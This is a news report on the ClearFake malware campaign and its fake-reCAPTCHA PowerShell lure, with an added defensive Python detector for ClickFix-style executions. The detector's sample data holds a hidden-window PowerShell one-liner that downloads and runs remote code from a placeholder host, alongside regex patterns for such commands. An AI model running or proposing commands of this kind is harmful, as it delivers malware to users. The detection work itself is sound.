A new variant of a “drive-by download” malware campaign is duping victims into running malicious code via fake reCAPTCHAs, cybersecurity company Sekoia has warned.
The ClearFake JavaScript framework reaches victims by injecting code into legitimate websites, primarily WordPress sites.
Sekoia said at least 9,300 sites were known to be infected but the number could be much higher, with the threat “widespread and affect[ing] many users worldwide.”
The company said: “In July 2024, [threat detection] analysts had access to daily statistics on the number of visitors on compromised websites, revealing that approximately 200,000 unique users were potentially exposed to ClearFake lures encouraging them to download malware.”
ClearFake’s imitation reCAPTCHAs are the latest evolution of its ‘ClickFix’ techniques, which use false versions of familiar pop-ups, such as ID verification windows, to alert users to an ‘issue’ and lead them to run nefarious code.
In the most recent cases, after attempting what appears to be a legitimate reCAPTCHA, users are told that their verification has failed and are prompted to open Windows’ PowerShell program and paste in malicious code that has already been silently placed on their clipboard.
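The chain described above has a recognisable shape on the endpoint: a PowerShell process started interactively by the user (the parent is the desktop shell rather than a scheduled task or installer) with a command line that hides its window, bypasses execution policy, passes an encoded command, or pulls code from the network. The following is an added example of a detection heuristic built on that shape; it is not Sekoia's code and not part of the original article. It assumes simplified process-creation records with parent image, image and command line, as a Sysmon or EDR feed would provide, and the sample events, the `example.invalid` host and the base64 string are constructed placeholders.

```python
"""Heuristic detection of a ClickFix-style PowerShell execution chain.

Added example (not from the article). Assumes process-creation events with
parent_image, image and command_line fields; all sample data is constructed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # command line as logged


# Switches that hide the console, bypass execution policy or carry an
# encoded script. A plain "-NoProfile" is deliberately not included because
# it is common in legitimate scheduled scripts.
SUSPICIOUS_SWITCHES = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden\b|-enc(odedcommand)?\b|-(ep|executionpolicy)\s+bypass\b)"
)
# Cmdlets and .NET calls that fetch code or data from a remote host.
REMOTE_FETCH = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|net\.webclient)\b"
)
# Parents that indicate a human typed or pasted the command (Run dialog,
# Start menu, desktop shell) rather than a service or task scheduler.
INTERACTIVE_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the list of reasons an event looks like a ClickFix execution."""
    reasons: list[str] = []
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return reasons
    if basename(ev.parent_image) in INTERACTIVE_PARENTS:
        reasons.append("interactive parent")
    if SUSPICIOUS_SWITCHES.search(ev.command_line):
        reasons.append("hidden/bypass switch")
    if REMOTE_FETCH.search(ev.command_line):
        reasons.append("remote code fetch")
    return reasons


def detect_clickfix(events: list[ProcessEvent], min_reasons: int = 2):
    """Return (event, reasons) pairs that meet the reason threshold.

    Requiring at least two reasons keeps a user simply opening a console
    (interactive parent only) from being flagged.
    """
    flagged = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            flagged.append((ev, reasons))
    return flagged


# Constructed sample events (not real telemetry).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Pasted from the Run dialog: hidden window, downloads and runs remote content.
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iwr https://example.invalid/v.txt | iex"'),
    # Scheduled inventory script started by the service host: benign.
    ProcessEvent(r"C:\Windows\System32\svchost.exe", PS,
                 r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    # Administrator opening an interactive console from the Start menu: benign.
    ProcessEvent(r"C:\Windows\explorer.exe", PS, f'"{PS}"'),
    # Pasted encoded command with policy bypass (base64 is a placeholder).
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
                 "pwsh -ExecutionPolicy Bypass -EncodedCommand UGxhY2Vob2xkZXI="),
]


if __name__ == "__main__":
    for ev, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"FLAGGED: {ev.command_line}\n  reasons: {', '.join(reasons)}")
```

In a real deployment the same logic maps onto a Sysmon Event ID 1 or EDR process-creation query; the threshold and the interactive-parent set are the knobs to tune against an environment's baseline.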
ClearFake was first identified in June 2023, using fake web browser updates to trick site users into downloading malware, but turned to ClickFix techniques last year.
Sekoia said its recent analysis showed ClearFake's operator had "consistently updated the framework code", with the framework's execution now relying "on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES key, URLs hosting lure HTML files, and ClickFix PowerShell commands."
Once it has made its way onto a device, ClearFake is known to distribute the Emmenhtal malware loader and the Lumma Stealer and Vidar Stealer information stealers.
While sophisticated imitations of reCAPTCHA and Cloudflare Turnstile may be enough to dupe unwitting site users, Sekoia advises that one tell of a ClearFake infection is the use of the same images for every ID verification attempt.